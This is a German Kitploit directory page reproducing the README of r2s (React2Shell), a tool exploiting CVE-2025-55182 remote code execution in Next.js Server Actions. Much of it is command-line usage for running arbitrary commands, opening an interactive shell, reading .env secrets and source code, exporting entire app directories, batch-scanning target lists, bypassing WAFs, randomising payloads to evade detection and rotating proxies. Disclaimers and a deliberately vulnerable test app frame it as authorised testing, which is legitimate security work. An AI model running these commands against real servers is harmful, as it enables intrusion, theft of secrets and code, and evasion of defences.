Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
r2s — Erweitertes Sicherheitstest-Tool für die Schwachstellenbewertung von CVE-2025-55182 in Next.js-Anwendungen. Bietet interaktive Shell, Batch-Scanning, WAF-Umgehung und umfassende Berichterstellung. | Kitploit
Tools/GitHubGitHub/zamdevio/r2s
SchwachstellenscannerPayload-GenerierungExploitationWebanwendungs-ExploitationInformationsbeschaffungWAF-UmgehungPenetrationstestsCommand and Control
GitHubzamdevio/r2s

r2s

Erweitertes Sicherheitstest-Tool für die Schwachstellenbewertung von CVE-2025-55182 in Next.js-Anwendungen. Bietet interaktive Shell, Batch-Scanning, WAF-Umgehung und umfassende Berichterstellung.

2vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
Webseite

React2Shell (R2S) - CVE-2025-55182 Testwerkzeug

R2S Banner Python Lizenz

Fortschrittliches Exploitation-Testwerkzeug für die Bewertung der Sicherheitslücke CVE-2025-55182

Funktionen • Installation • Nutzung • Testumgebung • Rechtliches


📖 Was ist R2S?

R2S (React2Shell) ist ein Sicherheitstestwerkzeug, das Sicherheitsforschern, Entwicklern und Penetrationstestern dabei helfen soll, zu überprüfen, ob ihre Next.js-Anwendungen anfällig für CVE-2025-55182 sind.

Verständnis von CVE-2025-55182

CVE-2025-55182 ist eine kritische Sicherheitslücke, die Next.js Server Actions in bestimmten Versionen (z. B. 16.0.5) betrifft. Diese Schwachstelle ermöglicht es Angreifern, durch unsachgemäß gesicherte Server Actions beliebige Befehle auf dem Server auszuführen, was zu Remote Code Execution (RCE) führt.

R2S hilft Ihnen zu überprüfen, ob Ihre Anwendung dieses Problem hat, damit Sie es beheben können, bevor böswillige Akteure es finden.


⚠️ Wichtige Hinweise

Windows-Befehlsflag (--windows)

⚠️ KRITISCHE WARNUNG: Das --windows-Flag kann dazu führen, dass das Tool die Sicherheitslücke NICHT erkennt, wenn es falsch verwendet wird.

  • Standardverhalten: Das Tool verwendet Unix/Linux-Befehle (die meisten Next.js-Server laufen auf Linux)
  • Wann --windows verwenden: Nur wenn Sie zu 100 % sicher sind, dass der Zielserver Windows ist
  • Was passiert bei falscher Verwendung: Wenn Sie --windows auf einem Linux-Server verwenden, werden die Befehle fehlschlagen, und das Tool kann "nicht anfällig" melden, selbst wenn der Server anfällig ist
  • Best Practice: Lassen Sie das Tool die Plattform automatisch erkennen, oder verwenden Sie --windows nicht, es sei denn, Sie wissen, dass der Zielserver Windows ist

Beispiel:```bash

❌ WRONG - Using --windows on a Linux server

r2s -u http://linux-server.com -t --windows

Result: Commands fail, tool may report "not vulnerable" (FALSE NEGATIVE)

✅ CORRECT - Let tool use default Unix/Linux commands

r2s -u http://linux-server.com -t

Result: Proper detection of vulnerability

root@kitploit:~
---

## ⚠️ Rechtlicher Haftungsausschluss

**WICHTIG: LESEN SIE DIES, BEVOR SIE DIESES WERKZEUG VERWENDEN**

1. **Dieses Werkzeug ist AUSSCHLIESSLICH für LEGITIME SICHERHEITSTESTS vorgesehen**
   - ✅ Testen Sie Ihre eigenen Anwendungen
   - ✅ Testen Sie Anwendungen, für die Sie eine schriftliche Erlaubnis haben
   - ✅ Bildungszwecke und Sicherheitsforschung
   - ❌ **Niemals auf Systemen verwenden, die Ihnen nicht gehören oder für die Sie keine Testberechtigung haben**
   - ❌ **Niemals für böswillige Zwecke verwenden**

2. **Durch die Nutzung dieses Werkzeugs stimmen Sie Folgendem zu:**
   - Sie werden es nur auf Systemen verwenden, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Testgenehmigung haben
   - Ihnen ist bewusst, dass unbefugter Zugriff auf Computersysteme illegal ist
   - Sie übernehmen die volle Verantwortung für Ihre Handlungen
   - Die Autoren sind nicht verantwortlich für jeglichen Missbrauch dieses Werkzeugs

3. **Rechtliche Konsequenzen:**
   - Unbefugter Zugriff auf Computersysteme ist in den meisten Ländern eine Straftat
   - Ihnen drohen strafrechtliche Anklage, Geldstrafen und Freiheitsentzug
   - Holen Sie vor dem Testen immer eine schriftliche Genehmigung ein

4. **Dieses Werkzeug wird "WIE BESEHEN" ohne jegliche Gewährleistung bereitgestellt**

**Wenn Sie unter 18 Jahre alt sind, stellen Sie sicher, dass Sie eine erwachsene Aufsicht und Erlaubnis haben, bevor Sie dieses Werkzeug verwenden.**

---

## ✨ Funktionen

### Kernfunktionen
- 🔍 **Schwachstellenerkennung** - Schnell testen, ob ein Server für CVE-2025-55182 anfällig ist
- 💻 **Interaktive Shell** - Vollständige interaktive Shell-Sitzung über HTTPS mit Befehlsverlauf
- 📁 **Dateioperationen** - Verzeichnisse auflisten, Dateien lesen und Dateien/Archive exportieren
- 🔐 **Geheimnisextraktion** - Versuchen, Anwendungsgeheimnisse zu lesen (.env-Dateien, Konfigurationsdateien)
- 📄 **Codextraktion** - Versuchen, Anwendungsquellcode zu lesen
- 🖥️ **Systeminformationen** - OS-Info, Hostname, Benutzer und Umgebungsvariablen sammeln

### Erweiterte Funktionen
- 🚀 **Auto-Warming-Payloads** - Optimiert Payloads automatisch für beste Ergebnisse
- ⚡ **Parallele Ausführung** - Mehrere Befehle gleichzeitig ausführen
- 🎲 **Payload-Randomisierung** - Erkennung mit dynamischen Payloads umgehen
- 🛠️ **Exploit-Module** - Module im Metasploit-Stil (env_dump, file_search, network_scan, process_list)
- 🔄 **Weiterleitungsbehandlung** - Folgt automatisch HTTP-Weiterleitungen (301, 302, 303, 307, 308)
- 🎨 **Schöne Benutzeroberfläche** - Farbcodierte Ausgabe für einfaches Lesen
- 📊 **Umfassende Berichterstattung** - Berichte automatisch in den Formaten JSON, HTML, TXT mit operationsspezifischen Formatierern speichern
- ⚙️ **Konfigurationssystem** - JSON-basierte Konfiguration mit interaktivem Einstellungsbereich
- 📦 **Exportfunktion** - Einzelne Dateien oder gesamte App-Verzeichnisse als ZIP-Archive exportieren
- 🔒 **WAF-Umgehung** - Mehrere Umgehungstechniken (⚠️ Nicht garantiert – siehe Einschränkungen unten)

### Berichterstattung & Protokollierung
- 📝 **Automatisch Berichte speichern** - Berichte automatisch in `~/.r2s/reports/` mit menschenlesbaren Zeitstempeln speichern
- 📋 **Operationsspezifische Formate** - Verschiedene Berichtsformate für verschiedene Operationen (Shell, Test, Secrets usw.)
- 📜 **Befehlsverlauf** - Dauerhafter Befehlsverlauf, gespeichert in `~/.r2s/history`
- 🔍 **Prüfpfade** - Detaillierte Protokollierung aller Operationen in `~/.r2s/logs/audit.log`
- 🎨 **HTML-Berichte** - Schöne HTML-Berichte mit Dunkel-/Hellmodus, Kopierschaltflächen und Codeblöcken

---

## 📦 Installation

### Option 1: Aus dem Quellcode erstellen (Empfohlen)

1. **Repository klonen:**   ```bash
   git clone https://github.com/zamdevio/r2s.git
   cd r2s
  1. Abhängigkeiten installieren: ```bash pip install -r requirements.txt
    root@kitploit:~
  2. Erstellen Sie die eigenständige Binärdatei: ```bash ./build.sh
    root@kitploit:~
  3. Ins System installieren (optional): ```bash sudo cp dist/r2s /usr/local/bin/ sudo chmod +x /usr/local/bin/r2s
    root@kitploit:~
  4. Build-Artefakte bereinigen (optional): ```bash

    Remove build/, dist/, pycache/, and other build files

    ./build.sh cleanup
    root@kitploit:~

Option 2: Python-Skript direkt verwenden```bash

Install dependencies

pip install -r requirements.txt

Run directly

python3 -m react2shell.main --help

Or after building:

r2s --help

root@kitploit:~
---
## 🚀 Schnellstart

### Einfacher Schwachstellentest```bash
# Test if a server is vulnerable
r2s -u http://localhost:3000 -t

# With verbose output for more details
r2s -u http://localhost:3000 -t -v

⚠️ Wichtig: Verwenden Sie --windows nicht, es sei denn, Sie sind sicher, dass das Ziel Windows ist. Die Verwendung von --windows auf einem Linux-Server führt zu falschen Negativmeldungen (das Tool meldet möglicherweise "nicht anfällig", obwohl der Server anfällig ist).

Test mit Online-Demo

Wir stellen eine sichere Testumgebung unter https://r2s-arena.fly.dev bereit:```bash

Test the online demo

r2s -u https://r2s-arena.fly.dev -t

root@kitploit:~
### Lokal testen

Siehe [`nextjs/README.md`](https://github.com/zamdevio/r2s/blob/HEAD/nextjs/README.md) für Anleitungen zum lokalen Ausführen der angreifbaren App.

---

## 📚 Anwendungsbeispiele

### Kurzer Befehlsreferenz

**Häufigste Befehle:**
- `r2s -u URL -t` - Auf Schwachstelle testen (am häufigsten)
- `r2s -u URL --shell` - Interaktive Shell starten
- `r2s --targets FILE -t` - Batch-Scan mehrerer Ziele
- `r2s -u URL --system-info` - Systeminformationen abrufen
- `r2s -u URL --secrets` - Versuchen, Geheimnisse zu lesen
- `r2s -u URL --export-archive` - Gesamte App als Zip exportieren

**⚠️ Denken Sie daran**: Verwenden Sie `--windows` nicht, es sei denn, das Ziel ist Windows!

---

### Grundlegende Operationen```bash
# Test vulnerability
r2s -u http://localhost:3000 -t

# List directory contents
r2s -u http://localhost:3000 --list-dir /app

# Read files
r2s -u http://localhost:3000 --read-file .env
r2s -u http://localhost:3000 --read-file package.json

# Get system information
r2s -u http://localhost:3000 --system-info

# Execute custom commands
r2s -u http://localhost:3000 --command "whoami"
r2s -u http://localhost:3000 --command "uname -a"

Interaktive Shell```bash

Start interactive shell session

r2s -u http://localhost:3000 --shell

Features:

- Arrow keys for command history (↑/↓)

- Arrow keys for cursor movement (←/→)

- Command aliases: nano/vi/vim/emacs → cat, clear → cls

- Colored file/folder output in ls

- Persistent history saved to ~/.r2s/history

- Auto-save shell session reports

root@kitploit:~
### Exploit-Module```bash
# List available modules
r2s --list-modules

# Use a module
r2s -u http://localhost:3000 --module env_dump

# Use module with options
r2s -u http://localhost:3000 --module file_search --set pattern="*.env" --set path="/app"

# Get module information
r2s --module-info env_dump

Exportfunktion```bash

Export a single file

r2s -u http://localhost:3000 --export src/app/page.tsx

Saved to: ~/.r2s/exports/{domain}/src/app/page.tsx

Export entire app directory as zip archive

r2s -u http://localhost:3000 --export-archive

What it does:

- Creates a zip archive of the entire app directory on the server

- Automatically excludes files matching .gitignore patterns

- Downloads the archive to your local machine

- Automatically deletes the archive from the server after download

- Saved to: ~/.r2s/exports/{domain}/r2s_export_TIMESTAMP.zip

Note: This operation may take a while for large applications

Configure export directory

r2s settings

Navigate to "export" section and set "export_dir"

root@kitploit:~
### Geheimnisse & Code-Extraktion```bash
# Attempt to read application secrets
r2s -u http://localhost:3000 --secrets
# Tries: .env, .env.local, .env.production, config.json, etc.

# Attempt to read application source code
r2s -u http://localhost:3000 --code
# Tries: src/**/*.ts, src/**/*.tsx, src/**/*.js, etc.

Batch-Scanning (Mehrere Ziele)```bash

Scan multiple targets from file (one URL per line)

r2s --targets targets.txt -t

Batch mode: no interactive prompts, auto-continue

r2s --targets targets.txt --batch -t

Scan with rate limiting (2 requests per second)

r2s --targets targets.txt -t --rate 2

Add delay between targets (1 second)

r2s --targets targets.txt -t --delay 1

Combine options for safe batch scanning

r2s --targets targets.txt --batch -t --rate 1 --delay 2

root@kitploit:~
### Erweiterte Optionen```bash
# Parallel execution (run multiple commands simultaneously)
r2s -u http://localhost:3000 --parallel 5 --command "whoami;id;uname -a"

# WAF bypass (⚠️ Not guaranteed - see limitations below)
r2s -u http://localhost:3000 -t --waf-bypass

# Auto-warm payloads (optimize payloads before execution)
r2s -u http://localhost:3000 -t --auto-warm

# Randomize payloads (evade static detection)
r2s -u http://localhost:3000 --command "whoami" --randomize

# Different header strategies
r2s -u http://localhost:3000 -t --header-strategy chrome_latest
# Options: default, chrome_latest, firefox, minimal, assetnote

# Custom timeout (0 = no timeout)
r2s -u http://localhost:3000 --command "long-running-command" --timeout 0

# Disable SSL verification
r2s -u https://target.com -t --insecure

# Rate limiting (requests per second)
r2s -u http://localhost:3000 -t --rate 2

# Delay between requests (seconds)
r2s -u http://localhost:3000 --command "whoami" --delay 1

Proxy- und Netzwerkoptionen```bash

Use HTTP proxy

r2s -u http://localhost:3000 -t --proxy http://proxy.example.com:8080

Use proxy with authentication

r2s -u http://localhost:3000 -t --proxy http://user:[email protected]:8080

Load and rotate proxies from file (one proxy per line)

r2s -u http://localhost:3000 -t --proxy-file proxies.txt

Rate limiting with proxy rotation

r2s --targets targets.txt -t --proxy-file proxies.txt --rate 1

root@kitploit:~
### Protokollierung & Audit```bash
# Log all operations to specific file
r2s -u http://localhost:3000 -t --log r2s_session.log

# Create detailed audit trail (saved to ~/.r2s/logs/audit.log)
r2s -u http://localhost:3000 -t --audit

# Combine logging with batch scanning
r2s --targets targets.txt --batch -t --log batch_scan.log --audit

Einstellungen & Konfiguration```bash

Open interactive settings panel

r2s settings

Configure:

- Report formats (JSON, HTML, TXT per operation)

- Auto-save reports (on/off)

- Export directory

- Default timeouts

- And more...

Clean up all tool data

r2s cleanup

Removes: config, history, logs, reports, exports

Uninstall the tool (standalone binaries only)

r2s uninstall

root@kitploit:~
### Berichterstattung```bash
# Reports are auto-saved to ~/.r2s/reports/ by default
# Format: {operation}_{YYYYMMDD_HHMMSS}.{json,html,txt}

# Disable auto-save
r2s -u http://localhost:3000 -t --no-report

# Save to specific location (disables auto-save)
r2s -u http://localhost:3000 -t --output /path/to/report.json

# View reports
ls ~/.r2s/reports/
cat ~/.r2s/reports/test_20251206_120000.html

🎯 Häufige Anwendungsfälle

1. Testen Ihrer eigenen Anwendung```bash

Start your Next.js app

cd my-nextjs-app npm run dev

In another terminal, test it

r2s -u http://localhost:3000 -t

root@kitploit:~
### 2. Sicherheitsaudit```bash
# Comprehensive security check
r2s -u http://localhost:3000 -t --waf-bypass
r2s -u http://localhost:3000 --system-info
r2s -u http://localhost:3000 --secrets
r2s -u http://localhost:3000 --code
r2s -u http://localhost:3000 --export-archive

3. Bildungstests

Verwenden Sie die bereitgestellte nextjs-Anwendung für sichere, lokale Tests:```bash cd nextjs npm install npm run dev

Test in another terminal

r2s -u http://localhost:3000 -t

root@kitploit:~
Siehe [`nextjs/README.md`](https://github.com/zamdevio/r2s/blob/HEAD/nextjs/README.md) für detaillierte Anweisungen.

---

## 🏗️ Architektur

R2S verwendet eine modulare Architektur für Wartbarkeit und Erweiterbarkeit:```
react2shell/
├── main.py              # Main entry point
├── classes/             # Core classes
│   ├── detector.py     # Target detection
│   ├── executor.py     # Command execution
│   ├── modules.py      # Exploit modules system
│   ├── operations.py   # High-level operations
│   ├── payload.py      # Payload building and randomization
│   └── shell.py        # Interactive shell
├── services/            # Services
│   ├── config.py       # Configuration management (JSON)
│   ├── exporter.py     # File and archive export
│   ├── formatters.py   # Report formatters
│   ├── history.py      # Command history
│   ├── logger.py       # Logging and audit trails
│   ├── proxy.py        # Proxy management
│   └── reporter.py     # Report generation
└── utils/              # Utilities
    ├── colors.py       # Color utilities
    └── helpers.py      # Helper functions

Siehe react2shell/README.md für eine detaillierte Architekturdokumentation.


🧪 Testumgebung

Wir bieten eine sichere Testumgebung namens nextjs, mit der Sie das Tool testen können, ohne reale Systeme zu gefährden.

Online-Demo

Besuchen Sie: https://r2s-arena.fly.dev

Dies ist eine öffentlich zugängliche, absichtlich verwundbare Anwendung, die nur zu Testzwecken dient.

Lokales Testen

Siehe nextjs/README.md für Anweisungen zum lokalen Ausführen.

⚠️ Wichtig: Die nextjs-Anwendung ist absichtlich verwundbar und sollte NIE in der Produktion oder mit echten Daten verwendet werden.


📖 Befehlsreferenz

Grundlegende Befehle

Exportbefehle

BefehlBeschreibung
--export FILE, --ex FILEEinzelne Datei vom Ziel exportieren (gespeichert unter ~/.r2s/exports/{domain}/)
--export-archiveGesamtes App-Verzeichnis als Zip-Archiv exportieren. Erstellt Zip auf dem Server, lädt es herunter und löscht es dann vom Server. Schließt .gitignore-Muster aus. Gespeichert unter ~/.r2s/exports/{domain}/r2s_export_TIMESTAMP.zip

Modulbefehle

BefehlBeschreibung
--module NAMEExploit-Modul ausführen
--module-list, --list-modulesVerfügbare Module auflisten

Erweiterte Optionen

Berichtsoptionen

OptionBeschreibung
--output FILE, -o FILE

Netzwerk- und Proxy-Optionen

Batch- und Automatisierungsoptionen

OptionBeschreibung
--targets FILEMehrere Ziele aus Datei scannen (eine URL pro Zeile, unterstützt Kommentare mit #)
--batchBatch-Modus: alle interaktiven Eingabeaufforderungen überspringen, automatisch fortsetzen (nützlich für Automatisierung/Skripte)

Spezielle Befehle

BefehlBeschreibung
r2s settingsInteraktives Einstellungsfeld öffnen
r2s cleanup

🔧 Fehlerbehebung

"SSL Error"```bash

Use --insecure flag to bypass SSL verification

r2s -u https://target.com -t --insecure

root@kitploit:~
### "Verbindungsfehler"
- Überprüfen Sie, ob der Server läuft
- Überprüfen Sie die URL
- Überprüfen Sie die Firewall-Einstellungen
- Versuchen Sie, das Timeout zu erhöhen: `--timeout 30`

### "Anfrage blockiert"```bash
# Try WAF bypass (⚠️ Not guaranteed - see WAF Bypass Limitations below)
r2s -u https://target.com -t --waf-bypass

# Try different header strategies
r2s -u https://target.com -t --header-strategy chrome_latest
r2s -u https://target.com -t --header-strategy firefox

"Cannot Determine Vulnerability" oder falsch negative Ergebnisse

⚠️ WICHTIG: Windows Commands Flag

Wenn Sie falsch negative Ergebnisse erhalten (das Tool sagt "nicht anfällig", aber das Ziel ist es tatsächlich), überprüfen Sie:

  1. Haben Sie das --windows Flag verwendet?

    • Das --windows Flag bewirkt, dass das Tool Windows-Befehle verwendet (PowerShell, dir, usw.)
    • Wenn Ihr Ziel Unix/Linux ist (die meisten Next.js-Server sind das), führt die Verwendung von --windows dazu, dass das Tool FEHLSCHLÄGT
    • Das Tool wird versuchen, Windows-Befehle auf einem Linux-Server auszuführen, was fehlschlagen wird
    • Lösung: Entfernen Sie das --windows Flag (Unix/Linux ist die Standardeinstellung)
  2. Plattformerkenung

    • Das Tool erkennt die Plattform automatisch, aber Sie können es überschreiben
    • Verwenden Sie --windows nur, wenn Sie zu 100% sicher sind, dass das Ziel Windows ist
    • Die meisten Next.js-Installationen befinden sich auf Linux/Unix-Systemen
  3. Testbefehl

    • Der Standardtest verwendet den Unix-Befehl: echo $((41*271))
    • Mit --windows verwendet er: powershell -c "41*271"
    • Wenn der Server Linux ist, Sie aber Windows-Befehle verwenden, wird der Test fehlschlagen

Beispiel des Problems:```bash

❌ WRONG - This will fail if target is Linux

r2s -u http://linux-server.com -t --windows

✅ CORRECT - Let tool auto-detect or use default (Unix/Linux)

r2s -u http://linux-server.com -t

root@kitploit:~
### Einschränkungen der WAF-Umgehung

**⚠️ Wichtig:** Die WAF-Umgehungstechniken in diesem Tool sind **NICHT garantiert** und haben mehrere Einschränkungen:

- **Nicht universell**: Verschiedene WAFs verwenden unterschiedliche Erkennungsmethoden. Was für eine funktioniert, funktioniert möglicherweise nicht für eine andere.
- **Statische Erkennung**: Einige WAFs verwenden statischen Pattern-Matching, der umgangen werden kann, aber moderne WAFs setzen auf Verhaltensanalyse.
- **Ratenbegrenzung**: Viele WAFs implementieren Ratenbegrenzung, die wiederholte Versuche blockieren kann.
- **Maschinelles Lernen**: Fortschrittliche WAFs verwenden ML-Modelle, die sich anpassen und aus Angriffsmustern lernen.
- **Cloudflare/AWS WAF**: Enterprise-WAFs (Cloudflare, AWS WAF, etc.) sind extrem schwer zu umgehen.
- **Keine Garantien**: Die Umgehungstechniken sind experimentell und können gegen gut konfigurierte WAFs fehlschlagen.

**Bewährte Vorgehensweisen:**
- WAF-Umgehung als letztes Mittel verwenden
- Verschiedene Header-Strategien ausprobieren (`--header-strategy`)
- Mit `--randomize` kombinieren für bessere Ergebnisse
- Verstehen, dass einige Ziele möglicherweise unmöglich zu umgehen sind
- Immer auf Systemen testen, die einem gehören oder für die man eine Testberechtigung hat

### Build-Probleme```bash
# Make sure Python 3.7+ is installed
python3 --version

# Install dependencies
pip install -r requirements.txt

# Clean previous build artifacts
./build.sh cleanup

# Try building again
./build.sh

Bereinigen von Build-Artefakten

Um alle Build-Artefakte sicher zu entfernen (Build-Verzeichnisse, Cache-Dateien usw.):```bash ./build.sh cleanup

root@kitploit:~
Dadurch wird Folgendes entfernt:
- `build/` directory (PyInstaller-Build-Dateien)
- `dist/` directory (kompilierte Binärdateien)
- `__pycache__/` directories (Python-Cache, rekursiv)
- `*.pyc` files (kompilierter Python-Bytecode)
- `*.pyo` files (optimierter Python-Bytecode)
- `*.spec` files (PyInstaller-Spezifikationsdateien)

**Hinweis:** Dadurch werden nur Build-Artefakte entfernt, nicht Ihr Quellcode. Die Bereinigung ist sicher und wird vor dem Fortfahren um Bestätigung bitten.

---

## 📁 Dateistruktur```
r2s/
├── README.md                 # This file
├── LICENSE                   # MIT License
├── requirements.txt          # Python dependencies
├── build.sh                  # Build script for standalone binary
├── r2s_entry.py              # PyInstaller entry point
├── react2shell/              # Main package
│   ├── README.md            # Architecture documentation
│   ├── main.py              # Entry point
│   ├── classes/             # Core classes
│   ├── services/            # Services
│   └── utils/               # Utilities
└── nextjs/                   # Testing environment
    └── README.md            # Testing environment documentation

🤝 Mitwirken

Beiträge sind willkommen! Bitte:

  1. Forken Sie das Repository
  2. Erstellen Sie einen Feature-Branch
  3. Nehmen Sie Ihre Änderungen vor
  4. Reichen Sie einen Pull-Request ein

Denken Sie daran: Tragen Sie nur Code bei, der für legitime Sicherheitstests hilfreich ist.


📝 Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die Datei LICENSE für Details.

Die Nutzung dieses Tools unterliegt jedoch dem obigen rechtlichen Haftungsausschluss. Die Verwendung dieses Tools für unbefugten Zugriff ist illegal und wird von dieser Lizenz nicht abgedeckt.


👨‍💻 Entwickler

zamdevio

  • GitHub: https://github.com/zamdevio
  • Projekt-Repository: https://github.com/zamdevio/r2s

🙏 Danksagungen

  • Sicherheitsforscher, die CVE-2025-55182 entdeckt haben
  • Die Open-Source-Sicherheitscommunity
  • Alle Mitwirkenden an diesem Projekt

📞 Unterstützung

  • Issues: GitHub Issues
  • Sicherheit: Melden Sie Sicherheitsprobleme verantwortungsbewusst

⚠️ Letzte Erinnerung

Dieses Tool dient NUR Sicherheitstests und Bildungszwecken.

  • ✅ Holen Sie immer vor dem Testen eine Genehmigung ein
  • ✅ Testen Sie nur Systeme, die Ihnen gehören oder für die Sie eine Testgenehmigung haben
  • ✅ Nutzen Sie es verantwortungsvoll und ethisch
  • ❌ Verwenden Sie es niemals für böswillige Zwecke
  • ❌ Testen Sie niemals Systeme ohne Genehmigung

Bleiben Sie legal, ethisch und sicher! 🛡️


Mit ❤️ für die Sicherheitscommunity gemacht

⬆ Zurück zum Anfang

Tool herunterladen
BefehlBeschreibung
-u, --url URLZiel-URL (für die meisten Vorgänge erforderlich)
-t, --testTesten, ob der Server verwundbar ist
-ld, --list-dir PATHVerzeichnisinhalt auflisten
-rf, --read-file FILEDateiinhalt lesen
-si, --system-infoSysteminformationen abrufen
-sr, --secretsVersuchen, Geheimnisse zu lesen
-c, --codeVersuchen, Quellcode zu lesen
-cmd, --command CMDBenutzerdefinierten Befehl ausführen
--shellInteraktive Shell starten
--module-info NAMEModulinformationen anzeigen
--set KEY=VALUEModuloption setzen
OptionBeschreibung
--waf-bypassWAF-Bypass-Techniken versuchen (⚠️ Nicht garantiert – siehe Einschränkungen unten)
--waf-bypass-size KBGröße der WAF-Bypass-Junk-Daten in KB (Standard: 128)
--vercel-waf-bypassVercel-spezifische WAF-Bypass-Techniken aktivieren
--header-strategy STRATEGYHTTP-Header-Strategie: default, chrome_latest, firefox, minimal, assetnote
--parallel NN Befehle parallel ausführen (nützlich für mehrere Befehle)
--auto-warmPayloads vor der Ausführung automatisch aufwärmen und optimieren
--randomizePayloads randomisieren, um statische Erkennung zu umgehen
--no-follow-redirectsHTTP-Weiterleitungen (301, 302 usw.) nicht automatisch folgen
-k, --insecureSSL-Zertifikatsprüfung deaktivieren (mit Vorsicht verwenden)
--timeout SECONDSAnfrage-Timeout in Sekunden (Standard: 10, 0 für kein Timeout)
--windows⚠️ WARNUNG: Windows-Befehle anstelle von Unix/Linux verwenden. Dies kann dazu führen, dass das Tool die Verwundbarkeit NICHT erkennen kann, wenn das Ziel tatsächlich Unix/Linux ist. Verwenden Sie dies nur, wenn Sie sicher sind, dass das Ziel Windows ist.
--rate RATEAnfragen auf RATE Anfragen pro Sekunde begrenzen (nützlich für Batch-Scans)
--delay SECONDSVerzögerung zwischen Anfragen in Sekunden hinzufügen (hilft, Ratenbegrenzung zu vermeiden)
--batchBatch-Modus: alle interaktiven Eingabeaufforderungen überspringen, automatisch fortsetzen (nützlich für Automatisierung)
Ergebnisse in bestimmte Datei speichern (deaktiviert automatisches Speichern)
--no-reportAutomatisches Speichern von Berichten unter ~/.r2s/reports/ deaktivieren
--log FILEAlle Vorgänge in angegebene Datei protokollieren (detailliertes Betriebsprotokoll)
--auditDetaillierten Prüfpfad erstellen (gespeichert unter ~/.r2s/logs/audit.log)
OptionBeschreibung
--proxy URLHTTP-Proxy verwenden (Format: http://proxy:port oder http://user:pass@proxy:port)
--proxy-file FILEProxys aus Datei laden und rotieren (ein Proxy pro Zeile, Format: http://proxy:port)
--rate RATEAnfragen auf RATE Anfragen pro Sekunde begrenzen (verhindert Überlastung des Ziels)
--delay SECONDSVerzögerung zwischen Anfragen in Sekunden hinzufügen (hilft, Ratenbegrenzung zu vermeiden)
Alle R2S-Daten löschen (Konfiguration, Verlauf, Protokolle, Berichte, Exporte)
r2s uninstallR2S-Binärdatei und alle Daten deinstallieren
r2s helpHilfemeldung anzeigen